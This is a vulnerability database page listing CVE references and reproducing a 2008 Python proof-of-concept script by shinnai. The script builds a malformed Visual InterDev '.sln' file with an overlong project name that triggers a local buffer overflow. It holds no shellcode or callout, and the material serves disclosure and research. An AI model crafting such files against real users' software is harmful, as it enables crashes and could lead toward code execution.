Lucene search
+L

Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)

🗓️ 03 Apr 2008 00:00:00Reported by shinnaiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 38 Views

Microsoft Visual InterDev 6.0 SP6 '.sln' Local Buffer Overflow Proof of Concep

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-0250
3 Apr 200800:00
circl
circl
Circl
CVE-2008-1709
3 Apr 200800:00
circl
cve
CVE
CVE-2008-0250
12 Jan 200802:00
cve
cve
CVE
CVE-2008-1709
9 Apr 200819:00
cve
cvelist
Cvelist
CVE-2008-0250
12 Jan 200802:00
cvelist
cvelist
Cvelist
CVE-2008-1709
9 Apr 200819:00
cvelist
exploitdb
Exploit DB
Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow
11 Jan 200800:00
exploitdb
nvd
NVD
CVE-2008-0250
12 Jan 200802:46
nvd
nvd
NVD
CVE-2008-1709
9 Apr 200819:05
nvd
prion
Prion
Buffer overflow
12 Jan 200802:46
prion
Rows per page
#usage: exploit.py FileName

import sys

print "--------------------------------------------------------------------------------"
print ' [PoC 2] Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " Execution of arbitrary code is possible, but it annoys me at the moment :)"
print "--------------------------------------------------------------------------------"

buff      = "a" * 264 + "bbbb" + "c" * 256

try:
    sln_file = \
        'Microsoft Visual Studio Solution File, Format Version 1.00\n'+\
        'Project("{}") = "' + buff + '"\n'+\
        'EndProject\n'

    out_file = open(sys.argv[1] + ".sln",'w')
    out_file.write(sln_file)
    out_file.close()
    print "\nFILE CREATION COMPLETED!\n"
except:
    print " \n -------------------------------------"
    print "  Usage: exploit.py FileName"
    print " -------------------------------------"
    print "\nAN ERROR OCCURS DURING FILE CREATION!"

# milw0rm.com [2008-04-03]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Nov 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.16885
38